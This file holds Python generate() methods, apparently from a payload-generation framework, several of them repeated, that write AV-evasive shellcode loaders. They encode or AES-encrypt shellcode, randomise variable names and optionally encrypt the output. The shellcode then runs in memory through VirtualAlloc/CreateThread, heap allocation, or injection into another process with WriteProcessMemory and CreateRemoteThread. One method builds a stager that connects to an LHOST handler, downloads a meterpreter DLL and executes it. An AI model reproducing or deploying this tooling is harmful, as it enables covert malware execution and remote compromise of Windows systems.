def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() num_tabs_required = 0 payload_code = '' payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() num_tabs_required = 0 payload_code = "" payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): payload_code, num_tabs_required = gamemaker.senecas_games(self) # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() pid_num_variable = evasion_helpers.randomString() pagerwx_variable = evasion_helpers.randomString() processall_variable = evasion_helpers.randomString() memcommit_variable = evasion_helpers.randomString() shell_length_variable = evasion_helpers.randomString() memalloc_variable = evasion_helpers.randomString() prochandle_variable = evasion_helpers.randomString() kernel32_variable = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'from ctypes import *\n' payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n' payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n' payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n' payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[ "PID_NUMBER"][0] + '\n' payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): payload_code, num_tabs_required = gamemaker.senecas_games(self) # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() pid_num_variable = evasion_helpers.randomString() pagerwx_variable = evasion_helpers.randomString() processall_variable = evasion_helpers.randomString() memcommit_variable = evasion_helpers.randomString() shell_length_variable = evasion_helpers.randomString() memalloc_variable = evasion_helpers.randomString() prochandle_variable = evasion_helpers.randomString() kernel32_variable = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'from ctypes import *\n' payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n' payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n' payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n' payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n' payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0] try: # read in the python source with open(PYTHON_SOURCE, 'r') as f: payload_code = f.read() except IOError: print(helpers.color("\n [!] PYTHON_SOURCE file \"" + PYTHON_SOURCE + "\" not found\n", warning=True)) return "" # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) # return everything self.payload_source_code = payload_code return
def generate(self): PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0] try: # read in the python source with open(PYTHON_SOURCE, 'r') as f: payload_code = f.read() except IOError: print( helpers.color("\n [!] PYTHON_SOURCE file \"" + PYTHON_SOURCE + "\" not found\n", warning=True)) return "" # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) # return everything self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() RandCipherObject = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # socket and shellcode variables that need to be kept global payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName) payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName) # build the socket and connect to the handler payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName) payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName) payload_code += '\t' * num_tabs_required + "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" # virtual lock to prevent the memory from paging out to disk payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n" # copy the .dll into the allocated memory payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n" # kick the thread off to execute the .dll payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" # wait for the .dll execution to finish payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n" # Assume HEAP Injection else: HeapVar = evasion_helpers.randomString() handleName = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the stager payload_code += '\t' * num_tabs_required + "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # Random letter substition variables encode_with_this = random.choice(self.hex_letters) decode_with_this = random.choice(self.non_hex_letters) # Generate Random Variable Names subbed_shellcode_variable_name = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_decoded_letter = evasion_helpers.randomString() rand_correct_letter = evasion_helpers.randomString() rand_sub_scheme = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('unicode_escape') Shellcode = Shellcode.decode('ascii') Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\') payload_code, num_tabs_required = gamemaker.senecas_games(self) # Add in the letter switching code payload_code += '\t' * num_tabs_required + 'import codecs\n' payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace( '\\\\', '\\') + '\'\n' payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n' if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() # Create Payload File payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
